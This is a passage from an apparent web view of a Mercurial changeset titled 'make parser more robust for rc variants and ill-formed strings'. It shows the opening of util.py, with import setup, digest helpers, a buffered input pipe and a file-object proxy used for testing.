##// END OF EJS Templates
version: make parser more robust for rc variants and ill-formed strings
Yuya Nishihara -
r37819:5cab6f50 stable
parent child Browse files
Show More
@@ -1,3863 +1,3876
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
63 empty = pycompat.empty
64 httplib = pycompat.httplib
64 httplib = pycompat.httplib
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def _rapply(f, xs):
138 def _rapply(f, xs):
139 if xs is None:
139 if xs is None:
140 # assume None means non-value of optional data
140 # assume None means non-value of optional data
141 return xs
141 return xs
142 if isinstance(xs, (list, set, tuple)):
142 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
143 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
144 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
146 return f(xs)
147
147
148 def rapply(f, xs):
148 def rapply(f, xs):
149 """Apply function recursively to every item preserving the data structure
149 """Apply function recursively to every item preserving the data structure
150
150
151 >>> def f(x):
151 >>> def f(x):
152 ... return 'f(%s)' % x
152 ... return 'f(%s)' % x
153 >>> rapply(f, None) is None
153 >>> rapply(f, None) is None
154 True
154 True
155 >>> rapply(f, 'a')
155 >>> rapply(f, 'a')
156 'f(a)'
156 'f(a)'
157 >>> rapply(f, {'a'}) == {'f(a)'}
157 >>> rapply(f, {'a'}) == {'f(a)'}
158 True
158 True
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161
161
162 >>> xs = [object()]
162 >>> xs = [object()]
163 >>> rapply(pycompat.identity, xs) is xs
163 >>> rapply(pycompat.identity, xs) is xs
164 True
164 True
165 """
165 """
166 if f is pycompat.identity:
166 if f is pycompat.identity:
167 # fast path mainly for py2
167 # fast path mainly for py2
168 return xs
168 return xs
169 return _rapply(f, xs)
169 return _rapply(f, xs)
170
170
171 def bitsfrom(container):
171 def bitsfrom(container):
172 bits = 0
172 bits = 0
173 for bit in container:
173 for bit in container:
174 bits |= bit
174 bits |= bit
175 return bits
175 return bits
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 r'mercurial')
194 r'mercurial')
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 DeprecationWarning, r'mercurial')
196 DeprecationWarning, r'mercurial')
197 # TODO: reinvent imp.is_frozen()
197 # TODO: reinvent imp.is_frozen()
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 DeprecationWarning, r'mercurial')
199 DeprecationWarning, r'mercurial')
200
200
201 def nouideprecwarn(msg, version, stacklevel=1):
201 def nouideprecwarn(msg, version, stacklevel=1):
202 """Issue an python native deprecation warning
202 """Issue an python native deprecation warning
203
203
204 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
204 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
205 """
205 """
206 if _dowarn:
206 if _dowarn:
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 " update your code.)") % version
208 " update your code.)") % version
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210
210
211 DIGESTS = {
211 DIGESTS = {
212 'md5': hashlib.md5,
212 'md5': hashlib.md5,
213 'sha1': hashlib.sha1,
213 'sha1': hashlib.sha1,
214 'sha512': hashlib.sha512,
214 'sha512': hashlib.sha512,
215 }
215 }
216 # List of digest types from strongest to weakest
216 # List of digest types from strongest to weakest
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218
218
219 for k in DIGESTS_BY_STRENGTH:
219 for k in DIGESTS_BY_STRENGTH:
220 assert k in DIGESTS
220 assert k in DIGESTS
221
221
222 class digester(object):
222 class digester(object):
223 """helper to compute digests.
223 """helper to compute digests.
224
224
225 This helper can be used to compute one or more digests given their name.
225 This helper can be used to compute one or more digests given their name.
226
226
227 >>> d = digester([b'md5', b'sha1'])
227 >>> d = digester([b'md5', b'sha1'])
228 >>> d.update(b'foo')
228 >>> d.update(b'foo')
229 >>> [k for k in sorted(d)]
229 >>> [k for k in sorted(d)]
230 ['md5', 'sha1']
230 ['md5', 'sha1']
231 >>> d[b'md5']
231 >>> d[b'md5']
232 'acbd18db4cc2f85cedef654fccc4a4d8'
232 'acbd18db4cc2f85cedef654fccc4a4d8'
233 >>> d[b'sha1']
233 >>> d[b'sha1']
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 >>> digester.preferred([b'md5', b'sha1'])
235 >>> digester.preferred([b'md5', b'sha1'])
236 'sha1'
236 'sha1'
237 """
237 """
238
238
239 def __init__(self, digests, s=''):
239 def __init__(self, digests, s=''):
240 self._hashes = {}
240 self._hashes = {}
241 for k in digests:
241 for k in digests:
242 if k not in DIGESTS:
242 if k not in DIGESTS:
243 raise error.Abort(_('unknown digest type: %s') % k)
243 raise error.Abort(_('unknown digest type: %s') % k)
244 self._hashes[k] = DIGESTS[k]()
244 self._hashes[k] = DIGESTS[k]()
245 if s:
245 if s:
246 self.update(s)
246 self.update(s)
247
247
248 def update(self, data):
248 def update(self, data):
249 for h in self._hashes.values():
249 for h in self._hashes.values():
250 h.update(data)
250 h.update(data)
251
251
252 def __getitem__(self, key):
252 def __getitem__(self, key):
253 if key not in DIGESTS:
253 if key not in DIGESTS:
254 raise error.Abort(_('unknown digest type: %s') % k)
254 raise error.Abort(_('unknown digest type: %s') % k)
255 return nodemod.hex(self._hashes[key].digest())
255 return nodemod.hex(self._hashes[key].digest())
256
256
257 def __iter__(self):
257 def __iter__(self):
258 return iter(self._hashes)
258 return iter(self._hashes)
259
259
260 @staticmethod
260 @staticmethod
261 def preferred(supported):
261 def preferred(supported):
262 """returns the strongest digest type in both supported and DIGESTS."""
262 """returns the strongest digest type in both supported and DIGESTS."""
263
263
264 for k in DIGESTS_BY_STRENGTH:
264 for k in DIGESTS_BY_STRENGTH:
265 if k in supported:
265 if k in supported:
266 return k
266 return k
267 return None
267 return None
268
268
269 class digestchecker(object):
269 class digestchecker(object):
270 """file handle wrapper that additionally checks content against a given
270 """file handle wrapper that additionally checks content against a given
271 size and digests.
271 size and digests.
272
272
273 d = digestchecker(fh, size, {'md5': '...'})
273 d = digestchecker(fh, size, {'md5': '...'})
274
274
275 When multiple digests are given, all of them are validated.
275 When multiple digests are given, all of them are validated.
276 """
276 """
277
277
278 def __init__(self, fh, size, digests):
278 def __init__(self, fh, size, digests):
279 self._fh = fh
279 self._fh = fh
280 self._size = size
280 self._size = size
281 self._got = 0
281 self._got = 0
282 self._digests = dict(digests)
282 self._digests = dict(digests)
283 self._digester = digester(self._digests.keys())
283 self._digester = digester(self._digests.keys())
284
284
285 def read(self, length=-1):
285 def read(self, length=-1):
286 content = self._fh.read(length)
286 content = self._fh.read(length)
287 self._digester.update(content)
287 self._digester.update(content)
288 self._got += len(content)
288 self._got += len(content)
289 return content
289 return content
290
290
291 def validate(self):
291 def validate(self):
292 if self._size != self._got:
292 if self._size != self._got:
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 (self._size, self._got))
294 (self._size, self._got))
295 for k, v in self._digests.items():
295 for k, v in self._digests.items():
296 if v != self._digester[k]:
296 if v != self._digester[k]:
297 # i18n: first parameter is a digest name
297 # i18n: first parameter is a digest name
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 (k, v, self._digester[k]))
299 (k, v, self._digester[k]))
300
300
301 try:
301 try:
302 buffer = buffer
302 buffer = buffer
303 except NameError:
303 except NameError:
304 def buffer(sliceable, offset=0, length=None):
304 def buffer(sliceable, offset=0, length=None):
305 if length is not None:
305 if length is not None:
306 return memoryview(sliceable)[offset:offset + length]
306 return memoryview(sliceable)[offset:offset + length]
307 return memoryview(sliceable)[offset:]
307 return memoryview(sliceable)[offset:]
308
308
309 _chunksize = 4096
309 _chunksize = 4096
310
310
311 class bufferedinputpipe(object):
311 class bufferedinputpipe(object):
312 """a manually buffered input pipe
312 """a manually buffered input pipe
313
313
314 Python will not let us use buffered IO and lazy reading with 'polling' at
314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 the same time. We cannot probe the buffer state and select will not detect
315 the same time. We cannot probe the buffer state and select will not detect
316 that data are ready to read if they are already buffered.
316 that data are ready to read if they are already buffered.
317
317
318 This class let us work around that by implementing its own buffering
318 This class let us work around that by implementing its own buffering
319 (allowing efficient readline) while offering a way to know if the buffer is
319 (allowing efficient readline) while offering a way to know if the buffer is
320 empty from the output (allowing collaboration of the buffer with polling).
320 empty from the output (allowing collaboration of the buffer with polling).
321
321
322 This class lives in the 'util' module because it makes use of the 'os'
322 This class lives in the 'util' module because it makes use of the 'os'
323 module from the python stdlib.
323 module from the python stdlib.
324 """
324 """
325 def __new__(cls, fh):
325 def __new__(cls, fh):
326 # If we receive a fileobjectproxy, we need to use a variation of this
326 # If we receive a fileobjectproxy, we need to use a variation of this
327 # class that notifies observers about activity.
327 # class that notifies observers about activity.
328 if isinstance(fh, fileobjectproxy):
328 if isinstance(fh, fileobjectproxy):
329 cls = observedbufferedinputpipe
329 cls = observedbufferedinputpipe
330
330
331 return super(bufferedinputpipe, cls).__new__(cls)
331 return super(bufferedinputpipe, cls).__new__(cls)
332
332
333 def __init__(self, input):
333 def __init__(self, input):
334 self._input = input
334 self._input = input
335 self._buffer = []
335 self._buffer = []
336 self._eof = False
336 self._eof = False
337 self._lenbuf = 0
337 self._lenbuf = 0
338
338
339 @property
339 @property
340 def hasbuffer(self):
340 def hasbuffer(self):
341 """True is any data is currently buffered
341 """True is any data is currently buffered
342
342
343 This will be used externally a pre-step for polling IO. If there is
343 This will be used externally a pre-step for polling IO. If there is
344 already data then no polling should be set in place."""
344 already data then no polling should be set in place."""
345 return bool(self._buffer)
345 return bool(self._buffer)
346
346
347 @property
347 @property
348 def closed(self):
348 def closed(self):
349 return self._input.closed
349 return self._input.closed
350
350
351 def fileno(self):
351 def fileno(self):
352 return self._input.fileno()
352 return self._input.fileno()
353
353
354 def close(self):
354 def close(self):
355 return self._input.close()
355 return self._input.close()
356
356
357 def read(self, size):
357 def read(self, size):
358 while (not self._eof) and (self._lenbuf < size):
358 while (not self._eof) and (self._lenbuf < size):
359 self._fillbuffer()
359 self._fillbuffer()
360 return self._frombuffer(size)
360 return self._frombuffer(size)
361
361
362 def readline(self, *args, **kwargs):
362 def readline(self, *args, **kwargs):
363 if 1 < len(self._buffer):
363 if 1 < len(self._buffer):
364 # this should not happen because both read and readline end with a
364 # this should not happen because both read and readline end with a
365 # _frombuffer call that collapse it.
365 # _frombuffer call that collapse it.
366 self._buffer = [''.join(self._buffer)]
366 self._buffer = [''.join(self._buffer)]
367 self._lenbuf = len(self._buffer[0])
367 self._lenbuf = len(self._buffer[0])
368 lfi = -1
368 lfi = -1
369 if self._buffer:
369 if self._buffer:
370 lfi = self._buffer[-1].find('\n')
370 lfi = self._buffer[-1].find('\n')
371 while (not self._eof) and lfi < 0:
371 while (not self._eof) and lfi < 0:
372 self._fillbuffer()
372 self._fillbuffer()
373 if self._buffer:
373 if self._buffer:
374 lfi = self._buffer[-1].find('\n')
374 lfi = self._buffer[-1].find('\n')
375 size = lfi + 1
375 size = lfi + 1
376 if lfi < 0: # end of file
376 if lfi < 0: # end of file
377 size = self._lenbuf
377 size = self._lenbuf
378 elif 1 < len(self._buffer):
378 elif 1 < len(self._buffer):
379 # we need to take previous chunks into account
379 # we need to take previous chunks into account
380 size += self._lenbuf - len(self._buffer[-1])
380 size += self._lenbuf - len(self._buffer[-1])
381 return self._frombuffer(size)
381 return self._frombuffer(size)
382
382
383 def _frombuffer(self, size):
383 def _frombuffer(self, size):
384 """return at most 'size' data from the buffer
384 """return at most 'size' data from the buffer
385
385
386 The data are removed from the buffer."""
386 The data are removed from the buffer."""
387 if size == 0 or not self._buffer:
387 if size == 0 or not self._buffer:
388 return ''
388 return ''
389 buf = self._buffer[0]
389 buf = self._buffer[0]
390 if 1 < len(self._buffer):
390 if 1 < len(self._buffer):
391 buf = ''.join(self._buffer)
391 buf = ''.join(self._buffer)
392
392
393 data = buf[:size]
393 data = buf[:size]
394 buf = buf[len(data):]
394 buf = buf[len(data):]
395 if buf:
395 if buf:
396 self._buffer = [buf]
396 self._buffer = [buf]
397 self._lenbuf = len(buf)
397 self._lenbuf = len(buf)
398 else:
398 else:
399 self._buffer = []
399 self._buffer = []
400 self._lenbuf = 0
400 self._lenbuf = 0
401 return data
401 return data
402
402
403 def _fillbuffer(self):
403 def _fillbuffer(self):
404 """read data to the buffer"""
404 """read data to the buffer"""
405 data = os.read(self._input.fileno(), _chunksize)
405 data = os.read(self._input.fileno(), _chunksize)
406 if not data:
406 if not data:
407 self._eof = True
407 self._eof = True
408 else:
408 else:
409 self._lenbuf += len(data)
409 self._lenbuf += len(data)
410 self._buffer.append(data)
410 self._buffer.append(data)
411
411
412 return data
412 return data
413
413
414 def mmapread(fp):
414 def mmapread(fp):
415 try:
415 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
416 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
418 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
420 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
421 if os.fstat(fd).st_size == 0:
422 return ''
422 return ''
423 raise
423 raise
424
424
425 class fileobjectproxy(object):
425 class fileobjectproxy(object):
426 """A proxy around file objects that tells a watcher when events occur.
426 """A proxy around file objects that tells a watcher when events occur.
427
427
428 This type is intended to only be used for testing purposes. Think hard
428 This type is intended to only be used for testing purposes. Think hard
429 before using it in important code.
429 before using it in important code.
430 """
430 """
431 __slots__ = (
431 __slots__ = (
432 r'_orig',
432 r'_orig',
433 r'_observer',
433 r'_observer',
434 )
434 )
435
435
436 def __init__(self, fh, observer):
436 def __init__(self, fh, observer):
437 object.__setattr__(self, r'_orig', fh)
437 object.__setattr__(self, r'_orig', fh)
438 object.__setattr__(self, r'_observer', observer)
438 object.__setattr__(self, r'_observer', observer)
439
439
440 def __getattribute__(self, name):
440 def __getattribute__(self, name):
441 ours = {
441 ours = {
442 r'_observer',
442 r'_observer',
443
443
444 # IOBase
444 # IOBase
445 r'close',
445 r'close',
446 # closed if a property
446 # closed if a property
447 r'fileno',
447 r'fileno',
448 r'flush',
448 r'flush',
449 r'isatty',
449 r'isatty',
450 r'readable',
450 r'readable',
451 r'readline',
451 r'readline',
452 r'readlines',
452 r'readlines',
453 r'seek',
453 r'seek',
454 r'seekable',
454 r'seekable',
455 r'tell',
455 r'tell',
456 r'truncate',
456 r'truncate',
457 r'writable',
457 r'writable',
458 r'writelines',
458 r'writelines',
459 # RawIOBase
459 # RawIOBase
460 r'read',
460 r'read',
461 r'readall',
461 r'readall',
462 r'readinto',
462 r'readinto',
463 r'write',
463 r'write',
464 # BufferedIOBase
464 # BufferedIOBase
465 # raw is a property
465 # raw is a property
466 r'detach',
466 r'detach',
467 # read defined above
467 # read defined above
468 r'read1',
468 r'read1',
469 # readinto defined above
469 # readinto defined above
470 # write defined above
470 # write defined above
471 }
471 }
472
472
473 # We only observe some methods.
473 # We only observe some methods.
474 if name in ours:
474 if name in ours:
475 return object.__getattribute__(self, name)
475 return object.__getattribute__(self, name)
476
476
477 return getattr(object.__getattribute__(self, r'_orig'), name)
477 return getattr(object.__getattribute__(self, r'_orig'), name)
478
478
479 def __nonzero__(self):
479 def __nonzero__(self):
480 return bool(object.__getattribute__(self, r'_orig'))
480 return bool(object.__getattribute__(self, r'_orig'))
481
481
482 __bool__ = __nonzero__
482 __bool__ = __nonzero__
483
483
484 def __delattr__(self, name):
484 def __delattr__(self, name):
485 return delattr(object.__getattribute__(self, r'_orig'), name)
485 return delattr(object.__getattribute__(self, r'_orig'), name)
486
486
487 def __setattr__(self, name, value):
487 def __setattr__(self, name, value):
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489
489
490 def __iter__(self):
490 def __iter__(self):
491 return object.__getattribute__(self, r'_orig').__iter__()
491 return object.__getattribute__(self, r'_orig').__iter__()
492
492
493 def _observedcall(self, name, *args, **kwargs):
493 def _observedcall(self, name, *args, **kwargs):
494 # Call the original object.
494 # Call the original object.
495 orig = object.__getattribute__(self, r'_orig')
495 orig = object.__getattribute__(self, r'_orig')
496 res = getattr(orig, name)(*args, **kwargs)
496 res = getattr(orig, name)(*args, **kwargs)
497
497
498 # Call a method on the observer of the same name with arguments
498 # Call a method on the observer of the same name with arguments
499 # so it can react, log, etc.
499 # so it can react, log, etc.
500 observer = object.__getattribute__(self, r'_observer')
500 observer = object.__getattribute__(self, r'_observer')
501 fn = getattr(observer, name, None)
501 fn = getattr(observer, name, None)
502 if fn:
502 if fn:
503 fn(res, *args, **kwargs)
503 fn(res, *args, **kwargs)
504
504
505 return res
505 return res
506
506
507 def close(self, *args, **kwargs):
507 def close(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
508 return object.__getattribute__(self, r'_observedcall')(
509 r'close', *args, **kwargs)
509 r'close', *args, **kwargs)
510
510
511 def fileno(self, *args, **kwargs):
511 def fileno(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
512 return object.__getattribute__(self, r'_observedcall')(
513 r'fileno', *args, **kwargs)
513 r'fileno', *args, **kwargs)
514
514
515 def flush(self, *args, **kwargs):
515 def flush(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
516 return object.__getattribute__(self, r'_observedcall')(
517 r'flush', *args, **kwargs)
517 r'flush', *args, **kwargs)
518
518
519 def isatty(self, *args, **kwargs):
519 def isatty(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
520 return object.__getattribute__(self, r'_observedcall')(
521 r'isatty', *args, **kwargs)
521 r'isatty', *args, **kwargs)
522
522
523 def readable(self, *args, **kwargs):
523 def readable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
524 return object.__getattribute__(self, r'_observedcall')(
525 r'readable', *args, **kwargs)
525 r'readable', *args, **kwargs)
526
526
527 def readline(self, *args, **kwargs):
527 def readline(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
528 return object.__getattribute__(self, r'_observedcall')(
529 r'readline', *args, **kwargs)
529 r'readline', *args, **kwargs)
530
530
531 def readlines(self, *args, **kwargs):
531 def readlines(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
532 return object.__getattribute__(self, r'_observedcall')(
533 r'readlines', *args, **kwargs)
533 r'readlines', *args, **kwargs)
534
534
535 def seek(self, *args, **kwargs):
535 def seek(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
536 return object.__getattribute__(self, r'_observedcall')(
537 r'seek', *args, **kwargs)
537 r'seek', *args, **kwargs)
538
538
539 def seekable(self, *args, **kwargs):
539 def seekable(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
540 return object.__getattribute__(self, r'_observedcall')(
541 r'seekable', *args, **kwargs)
541 r'seekable', *args, **kwargs)
542
542
543 def tell(self, *args, **kwargs):
543 def tell(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
544 return object.__getattribute__(self, r'_observedcall')(
545 r'tell', *args, **kwargs)
545 r'tell', *args, **kwargs)
546
546
547 def truncate(self, *args, **kwargs):
547 def truncate(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
548 return object.__getattribute__(self, r'_observedcall')(
549 r'truncate', *args, **kwargs)
549 r'truncate', *args, **kwargs)
550
550
551 def writable(self, *args, **kwargs):
551 def writable(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
552 return object.__getattribute__(self, r'_observedcall')(
553 r'writable', *args, **kwargs)
553 r'writable', *args, **kwargs)
554
554
555 def writelines(self, *args, **kwargs):
555 def writelines(self, *args, **kwargs):
556 return object.__getattribute__(self, r'_observedcall')(
556 return object.__getattribute__(self, r'_observedcall')(
557 r'writelines', *args, **kwargs)
557 r'writelines', *args, **kwargs)
558
558
559 def read(self, *args, **kwargs):
559 def read(self, *args, **kwargs):
560 return object.__getattribute__(self, r'_observedcall')(
560 return object.__getattribute__(self, r'_observedcall')(
561 r'read', *args, **kwargs)
561 r'read', *args, **kwargs)
562
562
563 def readall(self, *args, **kwargs):
563 def readall(self, *args, **kwargs):
564 return object.__getattribute__(self, r'_observedcall')(
564 return object.__getattribute__(self, r'_observedcall')(
565 r'readall', *args, **kwargs)
565 r'readall', *args, **kwargs)
566
566
567 def readinto(self, *args, **kwargs):
567 def readinto(self, *args, **kwargs):
568 return object.__getattribute__(self, r'_observedcall')(
568 return object.__getattribute__(self, r'_observedcall')(
569 r'readinto', *args, **kwargs)
569 r'readinto', *args, **kwargs)
570
570
571 def write(self, *args, **kwargs):
571 def write(self, *args, **kwargs):
